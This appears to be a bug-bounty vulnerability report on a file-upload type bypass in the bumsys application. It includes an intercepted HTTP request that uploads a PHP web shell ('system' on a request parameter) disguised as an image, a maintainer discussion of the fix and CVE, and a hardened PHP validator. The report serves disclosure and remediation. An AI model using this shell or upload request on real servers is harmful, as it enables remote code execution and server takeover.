File Upload Type Validation Error in unilogies/bumsys
Reported on
Jan 19th 2023
Description
The application does not properly validate the file type or extension during the upload process, which allows any authenticated user to bypass the upload restriction.
Steps To Reproduce
- Navigate to this URL: [https://demo.bumsys.org/settings/shop-list/](https://demo.bumsys.org/settings/shop-list/)
- Click on action button to edit the Profile
- Click on select logo button to upload the image
- Intercept the POST request and make the changes shown below.
Proof of Concept
- The application allows only jpeg, jpg and png image types to be uploaded.
- The following request was therefore modified to upload a PHP file and bypass the check, since the application only validates the Content-Type header of the part and not the extension of the file.
Burpsuite-Request
```http
POST /xhr/?module=settings&page=updateShop HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=1; currencySymbol=%EF%B7%BC; keepAlive=1; __0bb0b4aaf0f729565dbdb80308adac3386976ad3=9lqop41ssg3i9trh73enqbi0i7
Content-Length: 1280
Sec-Ch-Ua: "Chromium";v="109", "Not_A Brand";v="99"
X-Csrf-Token: 78abb0cc27ab54e87f66e8160dab3ab48261a8b4
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynO0QAD84ekUMuGaA
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/settings/shop-list/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopName"

TEST
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopAddress"

test
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCity"

testcity
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopState"

teststate
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPostalCode"

700056
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopCountry"

testIND
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopPhone"

895623122
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopEmail"

test@gmail.com
------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopInvoiceFooter"

------WebKitFormBoundarynO0QAD84ekUMuGaA
Content-Disposition: form-data; name="shopLogo"; filename="profile picture.php"
Content-Type: image/png

<?php echo system($_REQUEST['dx']); ?>
```
Burpsuite-Response
```http
HTTP/1.1 200 OK
Date: Thu, 19 Jan 2023 07:14:26 GMT
Server: Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
X-Powered-By: PHP/7.0.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65

<div class='alert alert-success'>Shop successfully updated.</div>
```
Video PoC
https://drive.google.com/drive/folders/1FjCIRSSimDherYajo1X8Sm-8voDBkITH?usp=sharing
Impact
Since the application is not properly validating the file extension and a PHP file is uploaded, it could potentially allow an attacker to execute arbitrary code on the server.
References
@ctflearner, Thank you so much for the report. It is really admirable work.
By the way, is there any virus in that PHP file? I do not think so, but my system is detecting it as a virus!
Looking forward to hearing from you.
So, should I validate the file extension instead of the file type, or both? What would be the best solution for this? Thanks.
@khurshid Alam, talking about the PHP file, it doesn't contain a virus.
Talking about the validation, you should implement both.
@ctflearner, I have updated the issue on https://demo.bumsys.org/. Could you please confirm whether it is fixed or not, so I can update the repo?
Thank you.
@khurshid Alam, the above issue is fixed, but you have to implement one extra thing: "Obfuscating file extensions". Here is a link to a resource, https://portswigger.net/web-security/file-upload, that you can look into to fix the issue.
@khurshid Alam, I would be glad if you could assign a CVE for this.
@ctflearner, thank you for confirming. Let me check the article.
I think obfuscating file extensions is not applicable here. Could you please check the code and let me know if it is okay?
Yes, it is okay. Kindly look into my request for a CVE for this.
You can contact huntr-dev for CVE-related issues from your end; I cannot do anything from my side. Check the policy (https://huntr.dev/policy/) or mail them about how to assign a CVE. Thanks.
I think on this platform your CVE category is set to "NO"; if you could change it from "NO" to "YES", I mean "CVE: YES", then it will be easy for you to assign a CVE to a researcher.
You can refer to this website: https://www.cve.org/PartnerInformation/ListofPartners/partner/@huntrdev and please let me know if you have any issue or query.
And if you want to see a reference CVE report, you can visit the link below: https://nvd.nist.gov/vuln/detail/CVE-2022-4506
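Added example, not part of the thread and not bumsys code: it illustrates the flaw described in the Proof of Concept (the check trusts the client-supplied Content-Type of the multipart part) beside the "implement both" fix suggested above. The function names, the field name `shopLogo` and the sample inputs are assumptions constructed for the demo; the validator combines an extension allowlist, server-side content sniffing with `finfo`, a decode check with `getimagesize`, and a server-generated filename so the client's name is never reused.

```php
<?php
declare(strict_types=1);

// The flaw on this page in one line: the only input checked is the
// Content-Type the uploader put in the multipart part, which they control.
function vulnerableCheck(string $clientMime): bool
{
    return in_array($clientMime, ['image/png', 'image/jpeg'], true);
}

/**
 * Hardened check (assumed helper, not from bumsys): extension allowlist,
 * server-side MIME sniffing, extension/content consistency, image decode,
 * and a random server-chosen filename.
 * Returns ['ok' => bool, 'reason' => string, 'storeAs' => ?string].
 */
function validateImageUpload(string $tmpPath, string $originalName): array
{
    // Only the final extension counts, lowercased, and it must be allowlisted.
    $allowed = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg'];
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return ['ok' => false, 'reason' => "extension '$ext' not allowed", 'storeAs' => null];
    }

    // Sniff the real content with libmagic; ignore the client-sent Content-Type.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($tmpPath) ?: 'unknown';
    if ($detected !== $allowed[$ext]) {
        return ['ok' => false, 'reason' => "content is $detected, expected {$allowed[$ext]}", 'storeAs' => null];
    }

    // The file must actually decode as an image (magic bytes alone are not enough).
    if (@getimagesize($tmpPath) === false) {
        return ['ok' => false, 'reason' => 'not a decodable image', 'storeAs' => null];
    }

    // Never reuse the client name: random name plus the allowlisted extension.
    $storeAs = bin2hex(random_bytes(16)) . '.' . ($ext === 'jpeg' ? 'jpg' : $ext);
    return ['ok' => true, 'reason' => 'ok', 'storeAs' => $storeAs];
}

// Constructed inputs for a stand-alone run; no real upload is involved.
$png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg=='); // 1x1 PNG
$phpText = "<?php /* constructed non-image content */ ?>\n";

$cases = [
    ['name' => 'logo.png',            'body' => $png,     'clientMime' => 'image/png'], // legitimate
    ['name' => 'profile picture.php', 'body' => $phpText, 'clientMime' => 'image/png'], // shape of the report's request
    ['name' => 'logo.png',            'body' => $phpText, 'clientMime' => 'image/png'], // right extension, wrong content
];

foreach ($cases as $c) {
    $tmp = tempnam(sys_get_temp_dir(), 'upl');
    file_put_contents($tmp, $c['body']);
    $weak = vulnerableCheck($c['clientMime']) ? 'accepted' : 'rejected';
    $r = validateImageUpload($tmp, $c['name']);
    printf("%-22s client-type-only: %-8s hardened: %s (%s)\n",
        $c['name'], $weak, $r['ok'] ? 'accepted' : 'rejected', $r['reason']);
    unlink($tmp);
}
```

The client-type-only check accepts all three constructed cases because every one of them declares `image/png`; the hardened check accepts only the real PNG. A name such as `x.php.png` passes the extension step but still has to be a decodable PNG, and whatever passes is stored under a random name with the allowlisted extension, so the original filename never reaches disk. Pair the validator with storing uploads outside the document root, or in a directory the web server will not hand to the PHP handler, so that a future allowlist mistake cannot turn an upload into executable code.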